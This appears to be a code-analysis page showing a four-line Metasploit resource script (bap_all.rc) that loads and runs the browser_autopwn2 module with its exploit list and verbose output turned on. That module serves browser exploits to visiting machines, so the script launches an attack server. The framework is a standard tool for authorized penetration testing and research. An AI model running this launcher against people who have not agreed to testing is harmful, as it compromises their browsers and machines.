rapid7/metasploit-framework

View on GitHub
scripts/resource/bap_all.rc

Summary

Maintainability
Test Coverage
<ruby>
run_single("use auxiliary/server/browser_autopwn2")
run_single("set ShowExploitList true")
run_single("set VERBOSE true")
run_single("run")
</ruby>